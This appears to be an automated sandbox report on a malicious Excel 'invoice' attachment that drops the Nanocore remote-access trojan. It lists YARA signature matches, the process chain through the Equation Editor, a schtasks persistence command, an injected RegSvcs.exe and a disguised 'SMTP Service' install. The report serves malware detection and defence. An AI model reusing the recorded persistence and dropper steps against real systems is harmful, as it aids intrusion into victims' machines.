Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C8AE8 7_2_003C8AE8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C3020 7_2_003C3020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C9807 7_2_003C9807
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C30E7 7_2_003C30E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C9740 7_2_003C9740
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: nano[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gmSlQSien.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gmSlQSien.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gmSlQSien.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: nano[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: gmSlQSien.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/29@15/2
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D053E AdjustTokenPrivileges, 4_2_006D053E
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D0507 AdjustTokenPrivileges, 4_2_006D0507
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F10DA AdjustTokenPrivileges, 7_2_004F10DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F10A3 AdjustTokenPrivileges, 7_2_004F10A3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File created: C:\Program Files (x86)\SMTP Service Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{f57d5a77-8670-45ef-b736-5f3a07b68725}
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\NFKnYlgkNzhyGKSdXXNN
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE04.tmp Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ..................#.............h.#.....(.P.....h...............(............................................................................... Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Virustotal: Detection: 29%
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx ReversingLabs: Detection: 22%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: unknown Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Static file information: File size 2355200 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.pdbWindows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: ystem.pdb- source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: =T3UpC:\Windows\System.pdbA!`y source: RegSvcs.exe, 00000007.00000002.2395879525.0000000004FDC000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\RegSvcs.pdbN source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: ps.pdb source: RegSvcs.exe, 00000007.00000002.2394056812.00000000008BD000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2225121272.0000000001D90000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb``[ source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000003.2194043943.00000000006E3000.00000004.00000001.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2194187602.0000000000B10000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2394185585.0000000002130000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Initial sample: OLE indicators vbamacros = False
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_011D6A9F push es; iretd 4_2_011D6B77
Source: C:\Users\Public\vbc.exe Code function: 4_2_011DA2BC push es; retf 4_2_011DA2FC
